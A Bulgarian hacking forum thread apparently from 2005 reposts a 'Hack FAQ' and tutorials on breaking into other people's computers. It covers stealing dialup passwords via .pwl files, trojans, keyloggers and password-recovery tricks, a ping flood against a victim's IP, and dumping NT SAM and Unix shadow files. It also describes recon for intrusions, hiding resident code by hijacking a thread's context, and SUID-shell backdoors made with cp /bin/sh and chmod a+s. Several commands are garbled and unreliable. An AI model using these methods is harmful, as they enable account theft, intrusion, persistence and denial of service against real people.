Hack FAQ
Как да разберем паролата на чужд dialup?
• Намерете някакава пролука в провайдора и вземете всичките пароли…
Ако user'ът има разширен С: (достъпен за четене/понякога и запис), то може да копирате от там *.pwl и user.dat от директорията Windows. В .pwl се съхраняват шифрираните пароли за връзка (разкодирайте ги най-добре с PWLTool), а в user.dat се съхраняват телефите за връзката и паролата за Outlook Express. За намерането на такава "разширена " машина може да използвате NetBios-скенер от типа NAT, Essential NetTools и др.
• Може да изпратите на usr'а и троян. Основно съществуват две категории - MAIL и RAT…
Mail Trojans - програма за троянски кон, която работи с e-mail. Изпраща ви информацията (файлове, пароли и др.) по e-mail с машина за троянци.
RAT - Remote Administration Tools (програма за отдалечено администриране), позволява напълно или частично да управлява отдалечената машина…
BackDoors също се отнася към RAT, както е ясно от името му - "задна врата" чрез него също може да се управлява машина…
• Понякога не е необходимо да изпращате на някого троянци, след като може да се намерят заразени с RAT машини. Затова се използват различни скенери за открити портове (например SuperScan, PortScan). Ето малък списък на портовете, използвани от RAT-троянци:
1243 - SubSeven 1.x
1492 - FTP99CMP
6670 - Deep Throat
7306 - NetMonitor
12346 - NetBus 1.x
20034 - NetBus Pro
21544 - GirlFriend
23456 - EvilFtp
27374 - SubSeven 2.x
31337 - Back Orifice
54320 - Back Orifice 2000
• Може да се постави KEYLogger (клавиатурен шпионин) на този, чийто пароли желаете.
• Възможно е паролата за Интернет на user'а да е същата, каквато е на някаква пощенска кутия, например mail.bg… Може да отидете на сайта и в раздела "Забравени пароли" случайно да откриете отговора на зададения въпрос! Ако не го знаете опитайте се с хитрина да го разберете от самия user. А може и да използвате програмата за избор на парола за POP3.
-За сега това е всичко необходимо
Защо някои PWL файлове се разшифроват моментално, а други много дълго… а някои въобще не искат?
• Ако user'ът от който сте взели PWL'а използва парола за Windows, то pwl се шифрира с допълнителен ключ, затова не можеш да го хакнеш така лесно, паролите трябва да се подбират… А не се разкодира бързо затова, защото там няма парола. Забелязал съм, че ако размерът на файла е 688 байта, то той е празен…
Казват, че трябва се кодира…
Ами, да. Вие как мислите… има купища всякакъв software за защита на информацията… Ето няколко примера:
• PGP - Pretty Good Privacy позволява да се се кодира всичко, наистина всички Public Keys - MD …. Използвайте PGPDisk! Създайте Отделен Диск и съхранявайте там данните, които трябва да кодирате и… това и всичко.
• FSecure FileCrypto - не знам колко надеждна е тя, но много (в това число и аз) хора я ползват и са доволни. Указвате директорията която трябва да се шифрова, указвате паролата и готово… файлът се разшифрира в реално време.
• BestCrypt - шифрира данни… Повече нищо не знав, не съм я ползвал
• PureNoise - програма за шифриране разговорите на IRC…
• TSM - криптира вашите ICQ съобщения.
Знам IP на жертвата, какво мога да направя с него?
• Да, много неща, например:
• Може да сканираш портовете му, за да откриеш нещо отворено… дари някоя парола или троян без парола
• Може да го заблудиш, но най добре с shell, при който каналът е с няколко Mb … Избери ping -t -l 50000 IP.AD.DR.ES ..
• Може да се използва някакви експлоити за неговата ОС
В общи линии знам какво е IP, Ftp, Smtp…, но не разбирам за какво са те?
• TCP/IP - Transmission Control Protocol/Internet Protocol (Протокол за управление на трансфера/Интернет протокол). В мрежа работеща на TCP/IP информацията се предава чрез IP пакети. Връзката с мрежата се идентифицира с 32-разлядни IP-адреси, които ние изразяваме във вид на десетични числа разделени с точки (например, 127.0.0.1).
TCP - Transmission Control Protocol (Протокол за управление на трансфера) е ориентиран към работа с връзките и предава данните във вид на байтов поток.
IP - Internet Protocol, протокол от ниско ниво, който управлява пакетите данни между отделните системи, свързани с помощта на малшрутизатири за формиране на Интернет или Интанет (маршрутизаторът е компютър, който предава пакети данни от една система в друга).
FTP- File Transfer Protocol (Протокол за предаване на файлове), позволява да се предават файлове от едни компютър на друг чрез използването на ТСР връзки.
• SMTP - Simple Mail Transfer Protocol (Обикновен протокол за транфер на пощата) определя формата на съобщенията, които SMTP-клиента, работещ на един компютър, може да използва за изпращане на email на SMTP-сървър, намиращ се на друг компютър.
Как да си сменя IP'то?
• Най-простия начин е чрез използване на PROXY или SOCKS съвръри…За ICQ, FTP, IRC е нужно SOCKS, те обикновено стоят на port 1080… Също за IRC може да се използва BNC (Bouncers), но да се намерят е трудно… А PROXY може да намерите на http://proxycheck.spylog.com
Как да получа информация за домйн или IP?
• Може да отидеш тук: whois.internic.net, тук: whois.ripe.net или тук: whois.ripn.net. А може просто да използваш програмата SmartWhois… А ако искаш да видиш в коя част на смета се намира сървъра, то тогава ти е нужна NeoTrace.
DOS, DDOS… Какво е това?
• Дискова операционна Система …Е, да… DOS - Denial Of Service (Отказ от обслужване). Ако някой server го flood'нат, възползвайки се от уязвимостта му и той престане да отговаря на запитвания, то това може да се нарече DOS-атака…
DDOS - Distributed Denial Of Servise, това е когато DOS-атаките на няколко машини са съсредоточени в една точка…Тогава атакувания server бързо пада … Има различни прогрма-червеи, които могат да заразят server'и и да ги доведат до състояние на DDOS-атаки, например Trinoo.
Чувал съм, че за да се защитя от различни атаки, трябва да използвам FireWalls. Какво е това?
• Да. FireWall'ите са software'ни и hardware'ни. Software'ен firewall - програма, която филтрира входящия/изходящия трафик и го проверява по свои правила (които могат да се изменят естествено), например е забранено да се използва NETBIOS по време на DIALUP-сесия. Значи FireWall'ът ще блокира всички пакети отнасящи се за NETBIOS. Надявам се ме разбрахте…
Препоръчителен Fire Wall за Win9xx/NT е Conseal PC FireWall. Има още много други, например ATGUARD, FireWall-1, F-Secure FireWall и други…Може да потърсите за други и сами.
Как да намеря пароли с NT server? Къде се намилат те?
• За съхранение на паролите в NT се използва SAM (Security Accounts Manager). SAM се съхранява в директориите %systemroot%\system32\config, но не може да получите достъп до SAM при заредена ОС. Има друг изход. Ако администраторът е създал резервен диск, копие на SAM трябва да има и тук - %systemroot%\repair\sam._ (например c:\winnt\repair\sam._). Тези копия по подразбиране са достъпни за четене от всеки. Използвайки utility samdump, както и програмата L0pht Crack може да извлечете комбинации с името на user'a/парола от копирания SAM.
А нещо за паролите в *nix-os?
• Файл с пароли - /etc/passwd. Структурата изглежда така:login:password:UID:GID:comments:home:shell Ако видите ред от типа root:*:0:0:root:/bin/bash, значи паролата е падчертана (т.к. вместо парола има "*"). Паролите за login'а се съхраняват в /etc/shadow, както и в /etc/master.passwd (ако е BSD), които не са достъпни за обикновения ползвател. Паролите шифровани с DES за десодиране често използват John The Ripper. Понакога съществуват файлове от типа /etc/shadow.old (или .bak), които са достъпни за четене, но само по някога
Искам да използвам някакъв експлоит! Но как? Намерих един, но той има разширение .с.
• Закачете го на Unix server и наберете gcc exploit.c -o e… А после пуснете това, което се е получило - ./exploit.
Може също да възникне и въпросът - "А от къде да взема shell?"… От тук: http://www.freeshells.net, http://www.hobbiton.org, http://www.cyberspace.org и въобще потърсете в търсачките за free shell… А ако имате валидна CCs, то може да си закупите пълноценна shell ))
Изследване преди Взлом
Всеки мрежов взлом изисква няколко подготвителни изследвания, които трябва да осществи хакерът преди да седне зад компютъра. Грамотният "взломаджия" е необходимо да има определен обем информация. За да се заемеш с хакерството трябва да имаш определени знания в областта на компютрите и телекомуникациите (на ниво идеи), но за реалния взлом е необходимо най-напред телефонен номер или някакъв друг път за получаване на достъп до вражеския компютър. И в двата случая е необходимо предварително изследване. Преди да седнете зад компютъра ще ви се наложи да изследвате възможните способи за взлом и да изберете подходящия. И накрая ще извършите изследване след като получите достъп до избраната система, за да извлечете колкото се може повече полза от предоставилата ви се възможност. Като за начало нека да обсъдим какво трябва да се прави преди да се заемем с военните действия.
Избор на цел
Под "прицелване" разбирам процес в хода, на който хакерът решава какво именно от съществуващото програмно обезпечение си заслужава да се опита да "пробие". Тази тема по ред причини за някого може да се окаже тривиална, но тя заслужава да се обсъди по-подрoбно.
Да предположим, че сте новак в това дело. Да допуснем, че сте получили - по пътя на някакви собствени изследвания или по волята на случайността - информация, която според вас може да ви помогне да проникнете в определена система. Например, чрез нелегални компютърни канали сте се сдобили с телефонен номер на голяма правителствена база данни със сведения за шпионаж. Може просто да наберете този номер, за да се убедите дали са верни сведенията ви. Но от друга страна по-добре е първо да изследвате "дивеча" и да проверите дали си струва изразходваното време и похарчените пари за телефонната сметка, а също дали е оправдан риска при взлома. Потърсете дадения номер в телефонния указател или чрез телефонни справки. Ако той е обществено достъпен, то той по-скоро въобще не е компютърна линия и може да забравите за него. Може да ви се струва безсмислено изгубеното време при изследването на номера. Вместо това просто бихте го набрали. Но не забравяйте: преди да пипнете "дивеча" трябва да се сдoбиете с колкото се може повече информация за него. Действително ако номерът принадрежи на свръхсекретна база данни, бъдете готови за евентуално проследяване на обаждането. Във всички случай вашето позвъняване ще предизвика подозрение.
Новакът жадува да извърши своя пръв голям взлом и да извърши необмислена постъпка. Може би все още нямате опит при изменението на данните на телефонната компания или звъненето от автомат или някакъв друг способ за замаскиране на обаждането ви. Новакът набира секретния номер след предварителни изследвания, вероятно пак глупаво рискувайки, но той все пак се е придвижил с няколко степени по-високо по професионалната хакерска стълбица, от колкото други хлапета, които звънят въобще без всякаква подготовка - това е непоправима глупост.
И така, когато целта е избрана не е задължително веднага да се хвърляте в действие. Може да се окаже по-добре да изчакате, за да придобиете достатъчно опит да осъществите всичко както трябва. Ако действате ръководени от своите знания и опитът се провали, шансът за повторен опит е равен на нула, тъй като администраторът на системата също няма да стои със скръстени ръце. Преди да се снабдите с акваланг за откриване на потънали на дъното съкровища трябва първо да се научите да се държите на повърхността на водата, иначе ще потънете и това ще бъде скучна и бездарно и жалко за самите вас.
"Прицелването" включва и изследване от друг род. А ако наистина в ръцете си държите ключ към секретна информация? Вероятно първо трябва да помислите за най-добрия начин за проникване в тази система. Например, ако дадената система се намира в Интернет, налага ви се да измислите начин за влизане в системата под чуждо име. Но имайте пред вид, че на вашия "дивеч" може да хвърли око и някой друг ловец. Така че възможност за подготовка с години нямате. Хакерството е такова занимание, че побеждава най-енергичният.
Само най-големият идиот извършва взлом влизайки в системата под собственото си име. Преди да се заемете с каквото и да било измислете начин за вход под чуждо име. Взломът над компютърни системи от по-висок вид се дели на две части: частен взлом и обществен. Има се пред вид, че първоначално се маскирате под някакво частно лице и след това търсите начин за маскиране на вашия ползвател като регистриран ползвател на взломяваната система. Може да пропилеете сили, средства и време в опити за проникване в система, която в резултат може да се окаже безполезна. Затова след като сте наясно с това какво точно искате да откриете, трябва първоначално да осъществите необходимите изследвания. Изяснете си дали точно това са ХОРАТА, които вие сте избрали за постигане на целите си. Потенциалните мишени често могат да се изчислят, четейки свободно публикуваните открити документи. Те разчитат на "етично използване" на системата и често дават възможност да се надзълне в раздели защитени от погледа на простосмъртните.
Например, не отдавна ми се отдаде възможност да прочета малък откъс от стар доклад по мерки за безопасност. Той беше по-скоро списък с мерки, които трябва да се предприемат за повишаване защитата на компютърната мрежа. За времето, когато прочетох този откас мерките бяха вече приети, но мисълта за това, че защита действително е необходима, отдавна е отлетяла от главата на автора на доклада и информацията се оказала общодостъпна. Ето какво гласи заинтригувалият ме участък от доклада:
Мрежа 19 трябва напълно да е изолирана от персоналните компютри и широкополюсната мрежа с помощта на шлюзове. Входа в терминалните сървъри подлежи на защита. Персоналните компютри трябва да се снабдят със дъответстващи програмни обезпечения за осъществяване на наблюдение на мрежата с цел откриване на неправилното и/или неетичното й използване.
Погледнете какво море от информация може да се измлече от дадения откъс. Имайки пред вид тези препоръки за усилване на защитата няма да е трудно да открием същото това програмно обезпечение, което изпълнява функциите на защита. Тогава ще видим какво могат да правят тези програми и какво не. Може да потърсим в тях грешки или слаби места и да ги използваме. В най.лошия случай винаги сме в състояние да измислим друг способ за преодоляването на тези програми - нали на раменете си имаме глава, а не котел, нали? Но най-голям интерес представлява (и има непосредствено отношение към разсъждениета ни за "прицелването") споменавенето на "мрежа 19". Каква е тази "мрежа 19"? Защо администрацията е искала тя да бъде по-далече от чуждите очи? Ако подобен откъс попадне у хакер, той несъмнено ще избере "мрежа19" за обект на взлома си.
Това е един пример за случайно открита информация, която с успех може да се използва. Но помнете - аз изчитах ВСИЧКИ общодостъпни документи заради ЕДНА ЕДИНСТВЕНА задача - исках да извърша взлом. Това, че информацията попадна в ръцете ми е чиста СЛУЧАЙНОСТ, но тъвсенето провеждах ЦЕЛЕНАСОЧЕНО. Ако вашата цел е определена секретна компютърна система, разгледайте всички сходни с нея достъпни системи преди да се заемете с това, което ви интересува. Малко товар в джоба няма да натежи. Такова преглеждане може да доведе до полезни изводи, като случая с мрежа 19. В най-лошия случай ще се запознаете с различните стране на системата - "дивеч". А какво трябва да търсите езследвайки достъпната система? По какъв начин става входа и изхода в нея, има ли пролуки и как системата реагира на тях, какъв е форматът на командите и какъв тип команди е подходящ за използване, що за компютър е и какво "желязо" се намира в него. Разбира се съществуват и още някои нещица, които ще търсите от рода на информация за интерфейса или колко време отнема изпълнението на тази или онази програма. Тези сведения ще потрябват по-късно, когато вече се заемете със взлома. Тогава няма да ви се иска, а и не е много удачно, да губите време, за да намерите нужната команда или нещо по-елементарно като изход от системата.
"Прицелването" може да се окаже не само скучно, но и раздразнително занимание. Защо трябва да се мъчим и да се занимаваме с такива глупости като събиране на предварителна информация? Да, прави сте! Съзсем не сте задължени да приемате тази предложения, за които говоря. Няма задължителни правила за това какво ще правите преди да се заемете с делото. Това е мое мнение, но този, който е решил да нарушава закона, трябва, в крайна сметка, да знае как се прави това.
И така, разработете основен план на действие. Уверете се, че избраната от вас цел е подходяца за дадения случай. Тогава ще знаете, че вашия лабиринт няма да се превърне в един безкраен лабиринт. Може да искате и да сте доволни от проникването в който и да е попаднал ви под ръка компютър с помощта на подръчни средства. Много хакери го правят отдавайки се на влечението и проникват в системи, които не крият в себе си нищо особено. Те получават удовлетворение от самия процес на взлом. Но къде-къде по-интересно е да проникнеш в система с някакво ниво на секретност. Затова е необходимо да се проявява съобразителност при избора на цел. Проникването в системата е само половината работа, когато се окажете вътре ще ви бъде доста по-интересно.
Събиране на информация
Преди да пристъпите към своето изследване трябва да изясните какъв род информация се стремите да получите. Съществуват три теми, за които е длъжен да има представа хакерът: телекомуникациите въоще, системите въобще и конкретните системи в часност. Трябва да имате определено ниво на знания за компютрите, модемите, телефонните мрежи и човешката натура.
Влезте в близката библиотека или се сдибийте по друг начин с необходимите ви книги. Трябват ви книги за компютри, книги за углавното право и книги за управление на бизнеса. Също могат да се открият "легални" книги за хакерство и компютърно престъпление. Също трябва да разглеждате и книги, свързани с телекомуникацията. Ако искате да получите понятие за различните ситуации, в които може да попаднете, значи са ви необходими книги за информационните служби, интерактивна база данни, компютърни престъпления, операционни системи, BBS и за всичко, което има отношение към действията произтичащи с компютри и модеми. Не забравяйте и за спрамочниците - там се съдържат много полезни материали. Хакерството преди всичко се учи чрез практика, но в техническата литература също може да се намери не малко добри примери и хитринки… Но не ме разбирайте погрешно. Не искам да кажа, че трябва да прочетете всяка съществуваща книга. Съвсем нямам пред вид, че всичкото това трябва да прочетете преди да започнете първите си хакерски опити. Просто искам да кажа, че често хората не могат да си представят колко богата информация могат да почелпят от напълно достъпни източници, като не прибягват до никакъв взлом. Четейки книгите ще узнаете как изглеждат компютърните системи отвътре. Ще се запознаете с различни необходими команди, формати на имена и пароли, които се използват в различните системи. Като допълнение често в такива книги може да намерите списък с достъпни номера - след като позвъните може да проверите различните системи или да получите информация за тях. Всички тези сведения ще ви помогнат и ще ви придвижат напред. Не са за подценяване компютърните вестници и списания, а също и богатата информация, която се съдържа в Интернет. Има хиляди начини да се абонирате за най-новото в областта на компютърната защита. Аз например, знам всичко относно най-новите постижения в програмните продукти за защита. Въоръжен с такива сведения мога да се промъквам навсякъде по свой заобиколен начин. Знам как точно как точно залавят хакерите и по какъв начин да избегна капаните.
С някои нестандартни методи на изследване ще ви запозная следващия път. Дано не сам ви досадил с многото си наставления. Ако съм успял да ви накарам да се замислите над думите ми е добре. Свършил съм си работата!
Останалото ще го постна в следващия пост-Знам че ще наруша правилата,но пълния текст беше прекалено дълъг и не можах да го постна целия
PS.Ако някой знае други такива неща да казва
freaker
Oct 4 2005, 04:30 PM
Реших да преместя темата в раздел чат,защото това тук не се отнася конкретно за вин,пък и мога да поствам постове един след друг-четох го това в правилата-и така ще споделя информацията която имам по-бързо с вас:
Кефете се пак"
[quote]ШПИОНИ
Винаги ме е интересувал въпросът за програмите-шпиони. Представете си, резидентен код, който изпълнява някакви действия на вашия компютър, а вие не можете да го откриете. Възмотително, ама не е ли възмотително? А да имам такава програма винаги ми се е искало.
В Internet тази тема много широко се обсъжда, обсъжда се и си мисля, че винаги ще е на днемен ред. Сред огромното количество мнения, съждения и прочие словесен боклук, ми попадна твърдението на един гуру, което гласи: "Вие не можете да скриете процеса от функцията NtQuerySystemInformation". Това прилича повече на смъртна присъда. Кристалната мечта от моето детство бе разбита сега и завинаги. Но: много се надявам, че за програмите шпиони не съм мечтал само аз. На вас, мои духовни събратя ви посвещавам тази статийка. Сериозните чичкомци (по народному им викат системни администратори), работата на които се заключава в задушаването на свободния и прост народ: виноват, простите user'и не трябва да четат това. Всички по-нататъшни разсъждения ще са за процесор i386 ОС Windows NT 4.0 (SP4 или SP6), тъй като от Unix не разбирам.
Ох!
Да не ви се причува!
Покайвам се!
Простете!
Позор за моята посивяваща глава
Е, сега след като най-интелектуалната част от аудиторията гръмко тръшна вратата, встъплението може да завърши и да преминем към работа.
Отначало нека да поговорим за това как и защо се използват програмите шпиони. Да предположим, че вие сте влезли в Интернет и сте започнали да си теглите някаква удивителна програма, картинка, документ или каквото и да е друго. А в последствие се указва, че "злобните" хакери са забожили в тази програма вирус или троянски кон. Като опитен и шкулован user, вие веднага стартирате Task Manager и ГО виждате. След което ГО убивате чрез бутона End Process. Накои особено злобни хакери се оптвот да ви пуснат драйвър, но за наше щастие затова са необходими права на администратор. Това е обичайно развитие на събитията. А сега да предположим, че в Task Manager вие не ГО виждате, какво да правим? Обикновените user'и могат да се помислят, че няма нищо и че във файла няма троянец. Но това не са нашите user'и. Нормалния параноидален user веднага ще предосети опасността и ще бъде прав. Искам да отбележа, че тук не става дума за класически вирус. Безусловно вирусите са прекрасно изобретение на човечеството, но те имат един сериозен недостатък. А именно, че той работи само ЕДИН път при стартиране на инфектираната програма. Изпълнявойки своя къс от кода, той е принуден да предаде управлението на програмата носител. Ако пък му се иска да стане резидент, то тогава ще му се наложи някъде да "живее", тоест се създава процес.
Възможно ли е това: да бъдеш резидент (това звучи гордо!) и да не "светиш" в Task Manager! Отговарям, НАПЪЛНО ВЪЗМОЖНО! Позвънете веднага и само за 49,99$ вашата мечта ще стане реалност: Хм, простете, едвам изказах този рекламен бацил (езика не може да ми се обърне и да го нарека с благородната дума "вирус").
Повече от това за какво ни е този микрософтски Task Manager или Spy++, всеки малосериозен програмист може да напише Task Manager. Затова трябва да се крие от всичко свързано с това проклето семейство до седмо коляно включително. В сърцето си всеки Task Manager се явява функция NtQuerySystemInformation. Останалото са просто обвивка, рамки и още малко глупости. Въпреки,че тази функция е недокументирана от компанията …, в Интернет за нея е написано пре достатъчно. Затова тук няма да вникваме в подробностите, а ще кажем, че цялата информация, която вие виждате на екрана предствалява тази и само тази функция. И уви, гупуто беше прав! Вие действително не може да скриете процеса от NtQuerySystemInformation (наистина не знам как може да сатне това), влакното (fiber), АРС и DPC процедури, функции за обработка на изключванията и прекъсванията. Възможни са и купища други неща, за които не днаем. (ако говорим съвсем сериозно, то не се изпълнява процес, а негови потоци, затова процесът не се явява резидентен). И така, към днешния ден аз знам следните начини за скриване на резидентния код:
• Зареждане на дрейвер. Това е толкова примитивно, че изобщо няма да го обсъждаме. Освен всичко NtQuerySystemInformation предоставя информация и за драйверите, въпреки, че Task Manager не прави това. Е, а и на всичко отгоре има и SoftIce!
• Създава се поток за дадения процес. Този способ подродно е описан от Джефри Рихтер в книгата "Windows за професионалисти". Също така има и информация и от Мат Питерек в Интернет. Този способ е доста по-интерес и оригинален, но в днешно време си се явява класика и да удивиш някого с него е почти невъзможно. Резидентния код да се открие в този случай е доста тежко. В Task Manager при един от процесите се явява допълнителен поток, но кой от нас по памет ще каже какви процеси би трябвало да протичат например при Explorer.exe? Пак чрез Task Manager може да видим списъкът на заредените библиотеки, но отново кой би могъл по памет да каже кои трябва да са заредените в Explorer.exe. Накрая съществува възможност за проследяване на времената на протичащите процеси. Е, тук вече ще има разлика. С две думи бъдете внимателни към потоците в резидентните процеси.
• Всевъзможния Rootkit. Това е зареждане на драйвър, който прехваща съобщения към NtQuerySystemInformation и предоставя свои данни. За съжаление подробности не мога да изложа тъй като и аз не моге да си представя как става това. Несостатъка е същия - необходими са права на администратор! А ако на машината ви се пусне един такъв драйвър това означава само едно - беда.
• Hooking - относително нов начин. Основава се на функцията SetWindowsHookEx. До колкото разбирам на нея се основават и шпионите за клавиатурата, мишката и всичко останало свързано с hook. В Интернет способа не е описан достатъчно, но и за това няма да отнемам хляба на неговите създатели. При този способ не се създава нов поток (ако някой от вас знае защо, то моля ви, обяснете ми…). Библиотеката от където се извиква функцията за обработка, се зарежда във ВСИЧКО съществуващо и отново се създават процеси. Затова пуснете своя процес и ако в него се появи библиотека, която не познавате, то е крайно време да разчистите машината.
• Превключване контекста на потока. В дадения случай резидентния код се изпълнява в контекста на някой вече започнал поток. Между другото самото система доста широко използва потоци на ползватели за собствени нужди. Както пише Хелен Кастър в книгата "Основи на Windows NT и NTFS" системата "похищава" поток и го използва за обработка на прекъсвания, извиквания на DPC и системни АРС функции. Тоест не малка част от операционната система представлява сама по себе си програма-невидимка.
При използването на дадения метод не се създава нито нов процес, нито нав поток. Зареждането на библиотеки в други процеси не се налага. По такъв начин единствения косвен признак за съществуването на външен резидентен код се явява увеличението на използванат памет. Но паметта е най-активно разходвания ресурс. Практически всички програми постоянно отделят и освобождават памет и да се определи какво количество заети килобайтове се явяват нармални за този или онзи процес е изключително трудно.
Разбира се има и недостатъци. Първо, резидентния код може да се изпълнява само когато системата предава управлението на поток-носитл. Но е възможно и ситуация, при която потокът има твърде нисък приоритет и заради стеснената многозадачност рядко ще получава управлението. Дори повече потокът може да премине в състояние на очакване и да остане в него неопределено дълго време. Ако бъде завършен, то завършва и резидентния код. Работата на резидентния код в решаваща степен зависи от потока носител.
Накратко алгоритъмът на предлагаемия метод се състои в следното:
• Необходимо е да се намери подходящ процес тоест такъв имащ посттоянно работещи потоци с приоритет на нормален или по-големи (>8). За да се избегнат трудностите с правата има смисъл да се използва user'ск процес. За намиране на такъв процес се използва естествено същата функция NtQuerySystemInformation.
• След като нужния процес е намерен и са определени идентификаторите на потоците му, зареждаме в пространството на дадения процес изпълняемия резидентин код. За да не прибягваме до асемблер това може да го направим във вид на библиотека, но това е въпрос на предпочитение. Процедурата на зарежданетне на беиблиотеката в зададения процес е подробно описана от Джефри Рихтер.
• Преустановяваме един от потоците на процеса, съхраняваме неговия в текущия стек, създаваме нов стек, изменяме контекста на потока така, че указателя на текущата команда (регистър Eip) да указва нашия резидентен код, преминаваме към новия стек, "пробуждаме" потока. Сега ако естествено нищо не сме пропуснали (хе-хе), то при получения поток ще се изпълнява нашия резидентен код. Естествено това не е всичко, тъй като в нашата задача не влиза да нарушаваме нормалното изпълнение на процеса (че ние хакери ли сме, или…?).
• След като резидентния код е свършил дейността си е необходимо да се премине към стария стек и да се вазстанови стария контекст. Сега потока (по моему) трябва да работи в нормален режим.
Това струва ми се е всичко. Много е просто, нали? Разбира се някои непринципни детайли бяха пропуснати…)))
Взлом на UNIX
Бъгове UID и други дупки в Unix
Как може да се взломи една Unix система използвайки бъга UID (user identificators) и всичко проиятно и отвратително свързано с него. Манипулацията на UID открива много възможности пред ползватилите на системата. Считам за необходимо да ви запозная със смисъла и процесите на изменение на UID програмата. Малка справка: когато бит UID прибавен към шел, при пускане твоят UID се изменя в UID на реалния собственик на програмата и изхождайки от това може да се възползваш от получения досъп непосредствено преди затваряне на процеса на работа.
Следствие: можеш да използваш каквито и да е команди, като се намираш ход UID на получения достъп. По такъв начин постоянно имаш достъп до системата, даже при условие, даже при условие, че се промени използваната парола за логин. Даже бих казал, че това е мнага па-удобно, от колкото да знаеш самия логин. Истината е проста - докато файлът съществува в системата съществуваш и ти като нейн user. При получаване на достъпа умна постъпка от твоя страна ще е копирането на шела в която и да е директория и възстановяването на UID и GID битове. По такъв начин при загуба на логина от твоя страна може да се стартира UID-шел от друг логин, в резултат на което получаваш преследван достъп. По-долу има нагледен пример. Изваждането на UID и GID се осъществява с помощта на програмата chmod. Ето и един нагледен пример, където за команда chmod се поставя притежаващия тази сила съществуващ файл. Също трябва да помните за копирането на /bin/sh.
chmod hacker / tmp/ sh
Малко ли е? Условието е голямо (наличието на програма за поправки, самият достъп към поправките на файла и др.) в някои може да се осъществи подкопиране, съхранявайки бита UID. Копирайте bin/sh:
$ ls -l rwsrwsrws root XXXX
chsh
$ cp /bin/sh chsh
$ chsh
#
Сега за стандартно изменение на UID в облегчен вариант. Възможно е неговото преобразуване при условие, че имаш Write Access на UID файла. Ако имаш такива права, то след неговото копиране, трябва да въведете следната команда:
cat / bin/ sh > [самият UID файл]
държа да отбележа, че UID си остава предишния! После пускаме изфабрикуваната програма , правим скрития UID шел и връщаме UID файла в изходно състояние от резервното копие- също няма да е лошо да намерите файлове root c SUID:
find / -user root -perm -hacker -print
Няколко думи за дупките. Всичко отново опира да твоята възможност корегиране и поправка. Ако модификацията ни е разрешена, то тогава напред - използваме .profile:
$ ed .profile [номер] ? a cp /bin/sh .runme chmod a+x .runme chmod a+s .runme
(control-d)
? w [показва новят размер] ? q
$
След канекта с този профил твоят ID се превръща в модифициращ профил. Всичко танцува. Не забравяйте euid или както е прието да го норичаме "ефективен" UID, отчитайки оверрайда на реалния ID.
# chmod a+s /bin/ls
# exit
$ls -l /usr/fred
...... и така нататък.
Ls ще помогне да се справиш с всяка директория. С rm - се отделя и т.н. Голяма дупка в Unix системата се явяват програми, които са често пречка и за самите админи за модификацията на UID. Като правило в тях отсъства функцията за поправка до UID<100 и съответно GID. Но и програмата не забранява да го направите. С цел за самосъхранение няма да се спускам в продробности, искам да си спя у дома, а не заедно с насилниците на деца и убийците
И така, що се отнася до ползвателския достъп. С него е още по-лесно. Ако някой се е дисканектнал от системата без предварително да я е предупредил за приключване работата на сесията (множество примери logoff), то неговия достъп остава в работно състояние и е много лесно с малко усилие направо да получиш достъп до системата. В дадената ситуация е възможно извикване към системата с присъединяване към висящия TTY. Редултатът е влизане в системана и получаване на логин на даден достъп. Този бъг в системата се използва от много методи на взлом. Главното е навреме да се излезне от системата ))
По-нататък искам да предложа на user'ите още един не много известен способ buffer overflow, който вече е успял да стане достатъчно популярен в тесния кръг на "тъмния свят". В стека на програмите се извежда място под масива. Ако ти раздуеш дадения масив и после записваш в него в рамките на неговите граници, то този стек умира в страшни гърчове, т.е. осъществяват се неблагоприятни действия и терминация на самия стек. В частност при напускането на модула произтича преход към длучаен адрес. За изменение на нормалния ход на изпълнение на програмата може да се използва препълване на стека в резултат, на което ще се яви изменение на адреса ва възврата на функцията. Значи не е лошо да се използва прогромо за изпълнение на каквито и да е нестандартни действия, като стартиране на шел spawn при наличие на необходимия код. Но се случва и така, че програмата не го съдържа, т.е. не съдържа кода на адресното пространство на инструкциите. В дадения случай трябва да се направи следното: да се постави кода за изпълнение в прпълващия се буфер, да измени адреса на прехода в точка вътре в буфера. Sell code - код който се изпълнява при стартирането на шел. Получаваш Root shell, ако програмата за стартиране на шел се инсталира като SUID. Разбра ли? Това е всичко! Танци до припадък
Сега ще се занимаем с търсене на програми с възможности за срив на стека. Кой ли нен ни е казвал, че С с нищо не може да провери границите на масивите данни, значи чакаме препълване ))
Буферното препълване произтича от записаната в него информация с размери по-големи от колкото могат да се поместят в самия буфер. Библиотеката С включва в себе си за предоставяне на функцията копиране, но няма възможност за проверка на границата [sprintf, strcat, strcpy: ()] (за благото на масите). Функциите проверяват за прпълване при обработка на приеманите редове - използват се редове със символи \ (). Функцията gets() чете редове със стандартно въвеждане, т.е. stdin в буфера до забрава, докато не види символа за край на файла EOF или символа за нов ред. Тя също няма възможност за проверка на буферното препълване. Същата участ чака функциите от клас sccanf() в условията на преминаването на малки редове при изпълняването им. Често използвана конструкция е цикълът на посимволно въвеждане от stdin или понякога файла от буфера , до тогава докато не бъде срещнат EOL, EOF (символи за край на ред или файл съответно) или друг разделител. Тук много често се използват функциите функции getc(), fgetc() и getchar(). И отново ако не се осъществи проверка за препълване -> ПреПъЛваНе на БуФеРа!
Дадените уязвими места в системата се откриват при използването на greg програми - това са програми значително облекчаващи само търсене. Unix като система на бъдещето е длъжен да знае всеки и най-вече нейните разпространители, тъй като в действителност съществуват свободно достъпни в net'а източници на freeware'ни ОС, имащи чисто комерчески характер. Внимателно, хора!
Взлом с използване на демони, окачени на портовете, е един от двата най-популярни вида взлом. Като правило много хора позволяват демони да съществуват в техните системи, поставени там от недоброжелатели.Започвайки със sendmail'а можем да намерим доста прилично количество фригидни демони за осъществяване на взлом. Идентификацията на демоните на портовете е просто необходима при взлом чрез telnet. За изясняване на версията на демоните е необходимо да се telnet'неш на съответния открит порт на хоста, предварително извикани с помощта на програмата nmap (rulez,мой ибор!). Затова трябва да се направи следното:
nmap -sS -O -o x.log x.com (х-името на домейна)
